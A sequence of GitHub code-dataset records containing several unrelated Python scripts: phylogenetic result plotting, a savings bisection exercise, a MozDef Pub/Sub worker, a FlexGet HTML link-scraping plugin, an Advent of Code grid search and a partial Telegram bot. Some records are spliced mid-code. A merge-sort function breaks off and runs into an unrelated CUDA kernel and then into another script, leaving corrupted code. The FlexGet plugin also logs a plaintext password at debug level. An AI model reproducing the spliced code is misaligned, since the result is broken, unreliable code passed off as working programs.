97.5)))\n\t\t\t\t\t#print(str(numpy.percentile(treeLs, 2.5))+\" \"+str(numpy.percentile(treeLs, 50))+\" \"+str(numpy.percentile(treeLs, 97.5)))\n\t\t\t\t#else:\n\t\t\t\t#\tprint(\"Less than 100 samples!\")\n\t\t\tfileX.close()\n\t\t\tfileY.close()\n\t\t\tfileCorr.close()\n\t\t\t#fileSigma.close()\n\t\t\t#fileXoverY.close()\n\t\t\n\t\t\n\t\n\t#Phyrex\n\tanalyses=[\"No Bias BMP, phyrex\", \"Central Sampling BMP, phyrex\", \"Diagonal Sampling BMP, phyrex\", \"One sided sampling BMP, phyrex\", \"Broad sampling LFV, phyrex\", \"Narrow sampling LFV, phyrex\"]\n\tfoldersBEAST=[\"output/phyrex/sampled1/\",\"output/phyrex/sampled2/\",\"output/phyrex/sampled3/\",\"output/phyrex/sampled4/\", \"output/phyrex/LV/\",\"output/phyrex/LV/\"]\n\t#foldersRoots=[\"output/beast/sampled1/\",\"output/beast/sampled2/\",\"output/beast/sampled3/\",\"output/beast/sampled4/\",\"output/c_beast/sampled1/\",\"output/c_beast/sampled2/\",\"output/c_beast/sampled3/\",\"output/c_beast/sampled4/\",\"output/LV/\",\"output/LV/\",\"output/beast/sampled1/\",\"output/beast/sampled2/\",\"output/beast/sampled3/\",\"output/beast/sampled4/\",\"output/LV/\",\"output/LV/\"]\n\ttoSkip=[0,0,0,0,0,100]\n\tfor i in 
range(len(analyses)):\n\t\tprint(\"\\n\")\n\t\tprint(analyses[i])\n\t\tfileSigma=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_SigmaFormula_new2.txt\",\"w\")\n\t\tfileSigma2=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_SigmaObservedRoot_new2.txt\",\"w\")\n\t\tfileSigma3=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_SigmaObservedTips_new2.txt\",\"w\")\n\t\tfileSigma4=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_SigmaObservedTips1_new2.txt\",\"w\")\n\t\tfileSigman=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_SigmaFormula_new3.txt\",\"w\")\n\t\tfileSigma2n=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_SigmaObservedRoot_new3.txt\",\"w\")\n\t\tfileSigma3n=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_SigmaObservedTips_new3.txt\",\"w\")\n\t\tfileSigma4n=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_SigmaObservedTips1_new3.txt\",\"w\")\n\t\tfor j in range(N):\n\t\t\tskip=False\n\t\t\t#print(j)\n\t\t\tsigmas=[]\n\t\t\tsigmas2=[]\n\t\t\tsigmas3=[]\n\t\t\tsigmas4=[]\n\t\t\tfile=open(foldersBEAST[i]+\"phyrex_output/out_new2_phyrex_stats_\"+str(j+toSkip[i])+\"_ESS.txt\")\n\t\t\tline=file.readline()\n\t\t\tESS=int(line.replace(\"\\n\",\"\"))\n\t\t\tfile.close()\n\t\t\tfile=open(foldersBEAST[i]+\"phyrex_output/out_new2_phyrex_stats_\"+str(j)+\".txt\")\n\t\t\tline=file.readline()\n\t\t\tlinelist=line.split()\n\t\t\twhile len(linelist)<3 or linelist[0]!=\"sample\":\n\t\t\t\tline=file.readline()\n\t\t\t\tlinelist=line.split()\n\t\t\t\tif line==\"\":\n\t\t\t\t\tskip=True\n\t\t\t\t\tbreak\n\t\t\tif skip:\n\t\t\t\tcontinue\n\t\t\tsigsqi=linelist.index(\"sigSq\")\n\t\t\tsigsqobsi=linelist.index(\"realsigsqroot\")\n\t\t\t#sigsqobs2i=linelist.index(\"realsigsqtips\")\n\t\t\tsigsqobs2i=linelist.index(\"realsigsqtipsbis\")\n\t\t\tsigsqobs3i=linelist.index(\"realsigsqtipster\")\n\t\t\tline=file.readline()\n\t\t\tcount=0\n\t\t\twhile line!=\"\" and line!=\"\\n\":\n\t\t\t\tlinelist=line.split()\n\t\t\t\tcount+=1\n\t\t\t\tif count%thinPhyrex==0:\n\t\t\t\t\tsigsq=float(linelist[sigsqi])\n\t\t\t\t\tsigsqobs=float(linelist[sigsqobsi])\n\t\t\t\t\tsigsqobs3=float(linelist[sigsqobs2i])\n\t\t\t\t\tsigsqobs4=float(linelist[sigsqobs3i])\n\t\t\t\t\tsigmas.append(sigsq)\n\t\t\t\t\tsigmas2.append(sigsqobs)\n\t\t\t\t\tsigmas3.append(sigsqobs3)\n\t\t\t\t\tsigmas4.append(sigsqobs4)\n\t\t\t\t\tfileSigma.write(str(sigsq))\n\t\t\t\t\tfileSigma2.write(str(sigsqobs))\n\t\t\t\t\tfileSigma3.write(str(sigsqobs3))\n\t\t\t\t\tfileSigma4.write(str(sigsqobs4))\n\t\t\t\t\tfileSigma.write(\"\\t\")\n\t\t\t\t\tfileSigma2.write(\"\\t\")\n\t\t\t\t\tfileSigma3.write(\"\\t\")\n\t\t\t\t\tfileSigma4.write(\"\\t\")\n\t\t\t\t\tif ESS==1:\n\t\t\t\t\t\tfileSigman.write(str(sigsq))\n\t\t\t\t\t\tfileSigma2n.write(str(sigsqobs))\n\t\t\t\t\t\tfileSigma3n.write(str(sigsqobs3))\n\t\t\t\t\t\tfileSigma4n.write(str(sigsqobs4))\n\t\t\t\t\t\tfileSigman.write(\"\\t\")\n\t\t\t\t\t\tfileSigma2n.write(\"\\t\")\n\t\t\t\t\t\tfileSigma3n.write(\"\\t\")\n\t\t\t\t\t\tfileSigma4n.write(\"\\t\")\n\t\t\t\tline=file.readline()\n\t\t\tfileSigma.write(\"\\n\")\n\t\t\tfileSigma2.write(\"\\n\")\n\t\t\tfileSigma3.write(\"\\n\")\n\t\t\tfileSigma4.write(\"\\n\")\n\t\t\tif ESS==1:\n\t\t\t\tfileSigman.write(\"\\n\")\n\t\t\t\tfileSigma2n.write(\"\\n\")\n\t\t\t\tfileSigma3n.write(\"\\n\")\n\t\t\t\tfileSigma4n.write(\"\\n\")\n\t\t\tfile.close()\n\n\t\t\t#print(len(sigmas))\n\t\t\t#if len(sigmas)>100:\n\t\t\t#\tprint(str(numpy.percentile(sigmas, 2.5))+\" \"+str(numpy.percentile(sigmas, 50))+\" \"+str(numpy.percentile(sigmas, 
97.5)))\n\t\t\t#\tprint(str(numpy.percentile(sigmas2, 2.5))+\" \"+str(numpy.percentile(sigmas2, 50))+\" \"+str(numpy.percentile(sigmas2, 97.5)))\n\t\t\t#\tprint(str(numpy.percentile(sigmas3, 2.5))+\" \"+str(numpy.percentile(sigmas3, 50))+\" \"+str(numpy.percentile(sigmas3, 97.5)))\n\t\t\t\t#print(str(numpy.percentile(treeLs, 2.5))+\" \"+str(numpy.percentile(treeLs, 50))+\" \"+str(numpy.percentile(treeLs, 97.5)))\n\t\t\t#else:\n\t\t\t#\tprint(\"Less than 100 samples!\")\n\t\tfileSigma.close()\n\t\tfileSigma2.close()\n\t\tfileSigma3.close()\n\t\tfileSigma4.close()\n\t\tfileSigman.close()\n\t\tfileSigma2n.close()\n\t\tfileSigma3n.close()\n\t\tfileSigma4n.close()\n\t\t\n\t\t\nif ChangePhyrex:\n\tanalyses=[\"Broad sampling LFV, phyrex\", \"Narrow sampling LFV, phyrex\"]\n\tfoldersBEAST=[\"output/phyrex/LV/\",\"output/phyrex/LV/\"]\n\ttoSkip=[0,100]\n\tfor i in range(len(analyses)):\n\t\tfor j in range(N):\n\t\t\tfile=open(foldersBEAST[i]+\"phyrex_input/phyrex\"+str(j+toSkip[i])+\".xml\")\n\t\t\tfileNew=open(foldersBEAST[i]+\"phyrex_input/phyrex\"+str(j+toSkip[i])+\"_new.xml\",\"w\")\n\t\t\ttext=file.read()\n\t\t\t#print(line)\n\t\t\t#print(line.replace('mcmc.sample.every=\"1000\"','mcmc.sample.every=\"100\"'))\n\t\t\ttextNew=text.replace('mcmc.sample.every=\"1000\"','mcmc.sample.every=\"100\"').replace('mcmc.burnin=\"10000\"','mcmc.burnin=\"1000\"')\n\t\t\tfile.close()\n\t\t\tfileNew.write(textNew)\n\t\t\tfileNew.close()\n\t\n\t\n\t\n\t\n\t","repo_name":"AntanasKal/Phylogeography","sub_path":"python_scripts/make_plots.py","file_name":"make_plots.py","file_ext":"py","file_size_in_byte":20164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30082077971","text":"arr=[1,20,6,4,5]\r\ndef merge_sort(arr,n):\r\n\ttemp=[0]*n\r\n\treturn mergesort(arr,temp,0,len(arr)-1)\r\ndef mergesort(arr,temp,left,right):\t\t\t\t# MERGE SORT BASICS STEPS\r\n\tcount=0\r\n\tif left\r\n __global__ void relaxtionfun(double *signal, double *rela, double *sr, int length)\r\n {\r\n int x = blockIdx.x * blockDim.x + threadIdx.x;\r\n if (x '))\n\n#Initializing values\nr = 0.04\nportion_down_payment = 0.25\ntotal_cost = 1000000\ncost_down_payment = total_cost*portion_down_payment\ncurrent_savings = 0\nsemi_annual_raise = 0.07\ncounter = 1\nepsilon = 100\nhigh_guess = 10000\nlow_guess = 0\nmonthly_salary = annual_salary/12\nbisection = 1\nportion_saved = (high_guess + low_guess) / 2\n\n#Executing\nwhile (high_guess-low_guess) > 0:\n for i in range(1,37):\n if counter % 6 == 0:\n current_savings += current_savings*semi_annual_raise\n current_savings += monthly_salary*((portion_saved)/10000)\n current_savings += monthly_salary*r\n counter += 1\n if current_savings > (cost_down_payment+epsilon):\n high_guess = portion_saved\n print('high guess = portion saved')\n elif current_savings < (cost_down_payment-epsilon):\n low_guess = portion_saved\n print('low guess = portion saved')\n else:\n break\n bisection += 1\n current_savings = 0\n portion_saved = (high_guess + low_guess) / 2\n if portion_saved >= 10000:\n break\nportion_saved = portion_saved/10000\n\nif current_savings < (cost_down_payment-epsilon):\n print('It is impossible to pay down in 3 years')\nelse:\n print(f'Best savings rate {portion_saved}')\n print(f'Steps in bisection: {bisection}')\n\n\n","repo_name":"homebredcode/MIT-6.0001","sub_path":"Problem set 1/right amount v2.py","file_name":"right amount 
v2.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16934135255","text":"import json\nimport sys\nimport socket\nimport time\nfrom configlib import getConfig, OptionParser\nfrom datetime import datetime\nfrom mozdef_util.utilities.toUTC import toUTC\nfrom mozdef_util.utilities.logger import logger, initLogger\nfrom mozdef_util.elasticsearch_client import (\n ElasticsearchClient,\n ElasticsearchBadServer,\n ElasticsearchInvalidIndex,\n ElasticsearchException,\n)\nfrom google.cloud import pubsub\nfrom lib.plugins import sendEventToPlugins, registerPlugins\n\n# running under uwsgi?\ntry:\n import uwsgi\n\n hasUWSGI = True\nexcept ImportError as e:\n hasUWSGI = False\n\n\nclass PubSubtaskConsumer(object):\n def __init__(self, esConnection, options):\n self.esConnection = esConnection\n self.pluginList = registerPlugins()\n self.options = options\n self.scopes = [\"https://www.googleapis.com/auth/cloud-platform\", \"https://www.googleapis.com/auth/pubsub \"]\n self.credentials_file = options.credentials_file\n\n def run(self):\n # XXX: fetch from the config file\n subscriber = pubsub.SubscriberClient.from_service_account_file(self.options.credentials_file)\n res = subscriber.subscribe(self.options.resource_name, callback=self.onMessage)\n try:\n res.result()\n except Exception as e:\n logger.exception(e)\n logger.error(\n \"Received error during subscribing - killing self and my background thread in 5 seconds for uwsgi to bring me back\"\n )\n time.sleep(5)\n res.cancel()\n sys.exit(1)\n\n def onMessage(self, message):\n try:\n # default elastic search metadata for an event\n metadata = {\"index\": \"events\", \"id\": None}\n event = {}\n\n event[\"receivedtimestamp\"] = toUTC(datetime.now()).isoformat()\n event[\"mozdefhostname\"] = self.options.mozdefhostname\n\n event[\"details\"] = json.loads(message.data.decode(\"UTF-8\"))\n\n if \"tags\" in event[\"details\"]:\n event[\"tags\"] = event[\"details\"][\"tags\"].extend([self.options.resource_name])\n else:\n event[\"tags\"] = [self.options.resource_name]\n event[\"tags\"].extend([\"pubsub\"])\n\n (event, metadata) = sendEventToPlugins(event, metadata, self.pluginList)\n # Drop message if plugins set to None\n if event is None:\n message.ack()\n return\n self.save_event(event, metadata)\n message.ack()\n except Exception as e:\n logger.exception(e)\n logger.error(\"Malformed message: %r\" % message)\n message.ack()\n\n def save_event(self, event, metadata):\n try:\n # drop the message if a plug in set it to None\n # signaling a discard\n if event is None:\n return\n\n # make a json version for posting to elastic search\n jbody = json.JSONEncoder().encode(event)\n\n try:\n bulk = False\n if self.options.esbulksize != 0:\n bulk = True\n\n self.esConnection.save_event(index=metadata[\"index\"], doc_id=metadata[\"id\"], body=jbody, bulk=bulk)\n\n except (ElasticsearchBadServer, ElasticsearchInvalidIndex) as e:\n # handle loss of server or race condition with index rotation/creation/aliasing\n try:\n self.esConnection = esConnect()\n return\n except (ElasticsearchBadServer, ElasticsearchInvalidIndex, ElasticsearchException) as e:\n logger.exception(\"ElasticSearchException: {0} reported while indexing event\".format(e))\n return\n except ElasticsearchException as e:\n logger.exception(\"ElasticSearchException: {0} reported while indexing event\".format(e))\n logger.error(\"Malformed jbody: %r\" % jbody)\n return\n except Exception as e:\n 
logger.exception(e)\n logger.error(\"Malformed message: %r\" % event)\n\n\ndef esConnect():\n \"\"\"open or re-open a connection to elastic search\"\"\"\n return ElasticsearchClient((list(\"{0}\".format(s) for s in options.esservers)), options.esbulksize)\n\n\ndef initConfig():\n # capture the hostname\n options.mozdefhostname = getConfig(\"mozdefhostname\", socket.gethostname(), options.configfile)\n\n # elastic search options. set esbulksize to a non-zero value to enable bulk posting, set timeout to post no matter how many events after X seconds.\n options.esservers = list(getConfig(\"esservers\", \"http://localhost:9200\", options.configfile).split(\",\"))\n options.esbulksize = getConfig(\"esbulksize\", 0, options.configfile)\n options.esbulktimeout = getConfig(\"esbulktimeout\", 30, options.configfile)\n\n # GCP PubSub options\n options.resource_name = getConfig(\"resource_name\", \"\", options.configfile)\n options.credentials_file = getConfig(\"credentials_file\", \"\", options.configfile)\n\n options.mqprotocol = getConfig(\"mqprotocol\", \"pubsub\", options.configfile)\n\n\ndef main():\n if hasUWSGI:\n logger.info(\"started as uwsgi mule {0}\".format(uwsgi.mule_id()))\n else:\n logger.info(\"started without uwsgi\")\n\n # note: the one-element tuple is required here; a bare (\"pubsub\") is just a string\n if options.mqprotocol not in (\"pubsub\",):\n logger.error(\"Can only process pubsub queues, terminating\")\n sys.exit(1)\n\n # connect to GCP and consume our queue\n PubSubtaskConsumer(es, options).run()\n\n\nif __name__ == \"__main__\":\n # configure ourselves\n parser = OptionParser()\n parser.add_option(\n \"-c\", dest=\"configfile\", default=sys.argv[0].replace(\".py\", \".conf\"), help=\"configuration file to use\"\n )\n (options, args) = parser.parse_args()\n initConfig()\n initLogger(options)\n\n # open ES connection globally so we don't waste time opening it per message\n es = esConnect()\n\n try:\n main()\n except KeyboardInterrupt as e:\n logger.info(\"Exiting worker\")\n if options.esbulksize != 0:\n es.finish_bulk()\n except Exception as e:\n if options.esbulksize != 0:\n es.finish_bulk()\n raise\n","repo_name":"mozilla/MozDef","sub_path":"mq/esworker_pubsub.py","file_name":"esworker_pubsub.py","file_ext":"py","file_size_in_byte":6181,"program_lang":"python","lang":"en","doc_type":"code","stars":2170,"dataset":"github-code","pt":"61"} +{"seq_id":"905148993","text":"from __future__ import unicode_literals, division, absolute_import\nfrom builtins import * # noqa pylint: disable=unused-import, redefined-builtin\nfrom past.builtins import basestring\nfrom future.moves.urllib import parse\n\n\nimport logging\nimport posixpath\nimport zlib\nimport re\nimport io\n\nfrom jinja2 import Template\n\nfrom flexget import plugin\nfrom flexget.event import event\nfrom flexget.entry import Entry\nfrom flexget.utils.soup import get_soup\nfrom flexget.utils.cached_input import cached\n\nlog = logging.getLogger('html')\n\n\nclass InputHtml(object):\n \"\"\"\n Parses urls from html page. 
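A hypothetical minimal task configuration (a sketch built only from keys the
    validator below accepts; the URL is a placeholder):

        html:
          url: http://example.com/downloads/
          title_from: url
          links_re:
            - '\.torrent'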
Useful on sites which have direct download\n links of any type (mp3, jpg, torrent, ...).\n\n Many anime-fansubbers do not provide an RSS feed, so this works well in many cases.\n\n Configuration expects url parameter.\n\n Note: This returns ALL links on url so you need to configure filters\n to match only the desired content.\n \"\"\"\n\n def validator(self):\n from flexget import validator\n root = validator.factory()\n root.accept('text')\n advanced = root.accept('dict')\n advanced.accept('url', key='url', required=True)\n advanced.accept('text', key='username')\n advanced.accept('text', key='password')\n advanced.accept('text', key='dump')\n advanced.accept('text', key='title_from')\n advanced.accept('boolean', key='allow_empty_links')\n regexps = advanced.accept('list', key='links_re')\n regexps.accept('regexp')\n advanced.accept('boolean', key='increment')\n increment = advanced.accept('dict', key='increment')\n increment.accept('integer', key='from')\n increment.accept('integer', key='to')\n increment.accept('text', key='name')\n increment.accept('integer', key='step')\n increment.accept('boolean', key='stop_when_empty')\n increment.accept('integer', key='entries_count')\n return root\n\n def build_config(self, config):\n\n def get_auth_from_url():\n \"\"\"Moves basic authentication from url to username and password fields\"\"\"\n parts = list(parse.urlsplit(config['url']))\n split = parts[1].split('@')\n if len(split) > 1:\n auth = split[0].split(':')\n if len(auth) == 2:\n config['username'], config['password'] = auth[0], auth[1]\n else:\n log.warning('Invalid basic authentication in url: %s' % config['url'])\n parts[1] = split[1]\n config['url'] = parse.urlunsplit(parts)\n\n if isinstance(config, basestring):\n config = {'url': config}\n get_auth_from_url()\n return config\n\n @cached('html')\n @plugin.internet(log)\n def on_task_input(self, task, config):\n config = self.build_config(config)\n\n auth = None\n if config.get('username') and config.get('password'):\n log.debug('Basic auth enabled. 
User: %s Password: %s' % (config['username'], config['password']))\n auth = (config['username'], config['password'])\n\n increment = config.get('increment')\n base_url = config['url']\n if increment:\n entries = None\n if not isinstance(increment, dict):\n increment = {}\n current = increment.get('from', 0)\n to = increment.get('to')\n step = increment.get('step', 1)\n base_url = config['url']\n entries_count = increment.get('entries_count', 500)\n stop_when_empty = increment.get('stop_when_empty', True)\n increment_name = increment.get('name', 'i')\n\n template_url = Template(base_url)\n template_dump = None\n if 'dump' in config:\n dump_name = config['dump']\n if dump_name:\n template_dump = Template(dump_name)\n\n while to is None or current < to:\n render_ctx = {increment_name: current}\n url = template_url.render(**render_ctx)\n dump_name = None\n if template_dump:\n dump_name = template_dump.render(**render_ctx)\n new_entries = self._request_url(task, config, url, auth, dump_name)\n if not entries:\n entries = new_entries\n else:\n entries.extend(new_entries)\n if stop_when_empty and not new_entries:\n break\n if entries_count and len(entries) >= entries_count:\n break\n current += step\n return entries\n else:\n return self._request_url(task, config, base_url, auth, dump_name=config.get('dump'))\n\n def _request_url(self, task, config, url, auth, dump_name=None):\n log.verbose('Requesting: %s' % url)\n page = task.requests.get(url, auth=auth)\n log.verbose('Response: %s (%s)' % (page.status_code, page.reason))\n soup = get_soup(page.content)\n\n # dump received content into a file\n if dump_name:\n log.verbose('Dumping: %s' % dump_name)\n data = soup.prettify()\n with io.open(dump_name, 'w', encoding='utf-8') as f:\n f.write(data)\n\n return self.create_entries(url, soup, config)\n\n def _title_from_link(self, link, log_link):\n title = link.text\n # longshot from next element (?)\n if not title:\n title = link.next.string\n if title is None:\n log.debug('longshot failed for %s' % log_link)\n return None\n return title or None\n\n def _title_from_url(self, url):\n parts = parse.urlsplit(url)\n name = ''\n if parts.scheme == 'magnet':\n match = re.search('(?:&dn(?:\\.\\d)?=)(.+?)(?:&)', parts.query)\n if match:\n name = match.group(1)\n else:\n name = posixpath.basename(parts.path)\n return parse.unquote_plus(name)\n\n def create_entries(self, page_url, soup, config):\n\n queue = []\n duplicates = {}\n duplicate_limit = 4\n\n def title_exists(title):\n \"\"\"Helper method. 
Return True if title is already added to entries\"\"\"\n for entry in queue:\n if entry['title'] == title:\n return True\n\n for link in soup.find_all('a'):\n # not a valid link\n if not link.has_attr('href'):\n continue\n # no content in the link\n if not link.contents and not config.get('allow_empty_links', False):\n continue\n\n url = link['href']\n # fix broken urls\n if url.startswith('//'):\n url = 'http:' + url\n elif not url.startswith('http://') or not url.startswith('https://'):\n url = parse.urljoin(page_url, url)\n\n log_link = url\n log_link = log_link.replace('\\n', '')\n log_link = log_link.replace('\\r', '')\n\n # get only links matching regexp\n regexps = config.get('links_re', None)\n if regexps:\n accept = False\n for regexp in regexps:\n if re.search(regexp, url):\n accept = True\n if not accept:\n log.debug('url does not match any \"links_re\": %s' % url)\n continue\n\n title_from = config.get('title_from', 'auto')\n if title_from == 'url':\n title = self._title_from_url(url)\n log.debug('title from url: %s' % title)\n elif title_from == 'title':\n if not link.has_attr('title'):\n log.warning('Link `%s` doesn\\'t have title attribute, ignored.' % log_link)\n continue\n title = link['title']\n log.debug('title from title: %s' % title)\n elif title_from == 'auto':\n title = self._title_from_link(link, log_link)\n if title is None:\n continue\n # automatic mode, check if title is unique\n # if there are too many duplicate titles, switch to title_from: url\n if title_exists(title):\n # ignore index links as a counter\n if 'index' in title and len(title) < 10:\n log.debug('ignored index title %s' % title)\n continue\n duplicates.setdefault(title, 0)\n duplicates[title] += 1\n if duplicates[title] > duplicate_limit:\n # if from url seems to be bad choice use title\n from_url = self._title_from_url(url)\n switch_to = 'url'\n for ext in ('.html', '.php'):\n if from_url.endswith(ext):\n switch_to = 'title'\n log.info('Link names seem to be useless, auto-configuring \\'title_from: %s\\'. '\n 'This may not work well, you might need to configure it yourself.' 
% switch_to)\n config['title_from'] = switch_to\n # start from the beginning ...\n return self.create_entries(page_url, soup, config)\n elif title_from == 'link' or title_from == 'contents':\n # link from link name\n title = self._title_from_link(link, log_link)\n if title is None:\n continue\n log.debug('title from link: %s' % title)\n else:\n raise plugin.PluginError('Unknown title_from value %s' % title_from)\n\n if not title:\n log.warning('title could not be determined for link %s' % log_link)\n continue\n\n # strip unicode white spaces\n title = title.replace(u'\\u200B', u'').strip()\n\n # in case the title contains xxxxxxx.torrent - foooo.torrent clean it a bit (get up to first .torrent)\n # TODO: hack\n if title.lower().find('.torrent') > 0:\n title = title[:title.lower().find('.torrent')]\n\n if title_exists(title):\n # title link should be unique, add CRC32 to end if it's not\n hash = zlib.crc32(url.encode(\"utf-8\"))\n crc32 = '%08X' % (hash & 0xFFFFFFFF)\n title = '%s [%s]' % (title, crc32)\n # truly duplicate, title + url crc already exists in queue\n if title_exists(title):\n continue\n log.debug('uniqued title to %s' % title)\n\n entry = Entry()\n entry['url'] = url\n entry['title'] = title\n\n if 'username' in config and 'password' in config:\n entry['download_auth'] = (config['username'], config['password'])\n\n queue.append(entry)\n\n # add from queue to task\n return queue\n\n\n@event('plugin.register')\ndef register_plugin():\n plugin.register(InputHtml, 'html', api_ver=2)\n","repo_name":"bragatrosco/flexget","sub_path":"lib/python2.7/site-packages/flexget/plugins/input/html.py","file_name":"html.py","file_ext":"py","file_size_in_byte":11248,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"55305237","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by panos on 11/29/18\n# IDE: PyCharm\n\nimport os\nimport shutil\nimport re\nfrom warnings import warn\nfrom subprocess import check_output\nimport time\n\n\nclass FileOperation:\n def merge_dir(self, old_dst, new_dst, middle_path=''):\n \"\"\"\n Move a directory to another directory\n :param old_dst: The directory to be moved\n :param new_dst: The directory to move to\n :param middle_path: internal recursion helper; leave as the default\n :return:\n \"\"\"\n # determine whether old_dst is a directory, a file, or does not exist.\n if os.path.exists(old_dst):\n if os.path.isdir(old_dst):\n os.makedirs(new_dst, exist_ok=True)\n for ele in os.listdir(old_dst):\n ele_path = os.path.join(old_dst, ele)\n joined_middle_path = os.path.join(middle_path, ele)\n self.merge_dir(ele_path, new_dst, middle_path=joined_middle_path)\n elif os.path.isfile(old_dst):\n new_dst_path = os.path.join(new_dst, middle_path)\n os.makedirs(os.path.split(new_dst_path)[0], exist_ok=True)\n shutil.move(old_dst, new_dst_path)\n return True\n else:\n return False\n\n def read_status(self, path=None, simulate=True):\n \"\"\"\n Check the upload program status\n :param path: The path to call the upload program\n :param simulate: If True, the upload program will not be called.\n The result is True by default\n :return: Boolean, True meaning that the upload program is ready to upload\n \"\"\"\n if simulate:\n res = \"\"\"-------------- job stats ---------------\n ---------------- job stat ------------------\n JobName:local_test\n JobState:Running\n PendingTasks:0\n DispatchedTasks:0\n RunningTasks:0\n SucceedTasks:541\n FailedTasks:0\n ScanFinished:false\n RunningTasks Progress:\n 
----------------------------------------\n \"\"\"\n status = res\n else:\n res = check_output(['console', 'stat'], cwd=path, shell=True)\n status = res.decode()\n try:\n if 'no jobs is running' in status:\n return True\n JobStatus = re.compile('JobState:(.*?)\\\s').search(status).group(1)\n PendingTasks = int(re.compile('PendingTasks:(.*?)\\\s').search(status).group(1))\n RunningTasks = int(re.compile('RunningTasks:(.*?)\\\s').search(status).group(1))\n FailedTasks = int(re.compile('FailedTasks:(.*?)\\\s').search(status).group(1))\n DispatchedTasks = int(re.compile('DispatchedTasks:(.*?)\\\s').search(status).group(1))\n except AttributeError:\n time.sleep(1)\n return self.read_status(path)\n if PendingTasks == RunningTasks == FailedTasks == DispatchedTasks == 0 and JobStatus == 'Running':\n return True\n else:\n warn('The uploading program is not available now')\n return False\n","repo_name":"panoslin/DouYinSpider","sub_path":"douyin_feed_api/feed_api/integratedos.py","file_name":"integratedos.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"61"} +{"seq_id":"9506636380","text":"from day10 import get_data_as_ascii, get_knot_hash\nprint(\"(ignore above numbers (from day 10))\")\n\nINPUT = \"nbysizxe\"\n\n#\n#\tPart 1\n#\n\n# returns hexadecimal value in binary\ndef get_hex_as_binary(hexval):\n\t# 4 binary digits per 1 hexadecimal digit\n\tlength = len(hexval) * 4\n\tbinary = bin(int(hexval, 16))[2:]\n\n\t# add leading (padding) 0's\n\twhile ((len(binary)) < length):\n\t\tbinary = '0' + binary\n\n\treturn binary\n\n# returns the number of cells used\ndef get_used_count(key_string):\n\tcount = 0\n\n\t# for each row in disk,\n\tfor i in range(0,128):\n\t\t# hash the input, count the 1's\t\n\t\thash_input = key_string + \"-\" + str(i)\n\t\tknot_hash = get_knot_hash(get_data_as_ascii(hash_input))\n\t\tcount += get_hex_as_binary(knot_hash).count(\"1\")\n\t\n\treturn count\n\nused_count = get_used_count(INPUT)\nprint(used_count)\n\n#\n#\tPart 2\n#\n\n# returns the disk (128x128 grid)\ndef generate_disk(key_string):\n\tdisk = []\n\n\t# generate each row one by one\n\tfor i in range(0, 128):\n\t\thash_input = key_string + \"-\" + str(i)\n\t\tknot_hash = get_knot_hash(get_data_as_ascii(hash_input))\n\t\tdisk.append(list(map(int, list(get_hex_as_binary(knot_hash)))))\n\n\treturn disk\n\n# translates a coordinate into a formatted string - \"x:y\"\ndef hash_cell(x, y):\n\treturn str(x) + \":\" + str(y)\n\nclass DepthFirstSearch2D():\n\t'custom Depth First Search algorithm for 2d grids'\n\n\tdef __init__(self, grid, x, y):\n\t\tself.visited = []\n\t\tself.grid = grid\n\t\tself.visit(x, y)\n\t\n\t# marks the specified cell as 'visited', then 'visits' all connecting cells\n\t# connected cells == cells up/down/left/right\n\tdef visit(self, x, y):\n\t\t# don't retrace steps\n\t\tif hash_cell(x, y) in self.visited:\n\t\t\treturn\n\n\t\t# make sure coordinates are within bounds\n\t\tif y < 0 or y >= len(self.grid) or x < 0 or x >= len(self.grid[y]):\n\t\t\treturn\n\n\t\t# count cell as visited if cell has value of '1', otherwise stop\n\t\tif self.grid[y][x] == 1:\n\t\t\tself.visited.append(hash_cell(x, y))\n\t\telse:\n\t\t\treturn\n\n\t\t# visit all surrounding (up/down/left/right) cells\n\t\tself.visit(x-1, y)\n\t\tself.visit(x+1, y)\n\t\tself.visit(x, y-1)\n\t\tself.visit(x, y+1)\n\n# returns the number of regions within the disk\ndef get_region_count(disk):\n\tregions = []\n\n\t# cycle through every cell\n\tfor y in range(0, 
128):\n\t\tfor x in range(0, 128):\n\t\t\t# check if cell is already within a region\n\t\t\tfound = False\n\t\t\tcell_hash = hash_cell(x, y)\n\t\t\tfor region in regions:\n\t\t\t\tif cell_hash in region:\n\t\t\t\t\tfound = True\n\n\t\t\t# if cell not already found within existing regions,\n\t\t\tif not found:\n\t\t\t\t# generate its region\n\t\t\t\tdfs2d = DepthFirstSearch2D(disk, x, y)\n\n\t\t\t\t# only add regions that actually contain cells (lol I'm dumb)\n\t\t\t\tif len(dfs2d.visited) > 0:\n\t\t\t\t\tregions.append(dfs2d.visited)\n\n\treturn len(regions)\n\nregion_count = get_region_count(generate_disk(INPUT))\nprint(region_count)\n","repo_name":"goddtriffin/AdventOfCode-2017","sub_path":"day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12564779078","text":"from telegram import Update\nfrom telegram.ext import Updater, CommandHandler, CallbackContext\nfrom .data.config import Config, Fomal_subs\nfrom .fomal_bot_db import Db_looker\nimport os\nimport datetime\nimport logging\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\ndef top(num : int, sub : str):\n '''Gets the latest data from the db and builds the reply message'''\n db = Db_looker()\n db.connect_db()\n\n num = int(num)\n\n if sub not in Fomal_subs.subs:\n ret = \"At the moment only {} are supported\".format(Fomal_subs.subs)\n return ret\n\n if num <= 0 or num > 100:\n ret = \"\"\"I can only show you a top 1-100, \n the second argument must be between those values\"\"\"\n return ret\n\n if db.has_worked(): \n pd_mentions = db.fetch_top_db(forum = sub, top = num) \n \n else:\n 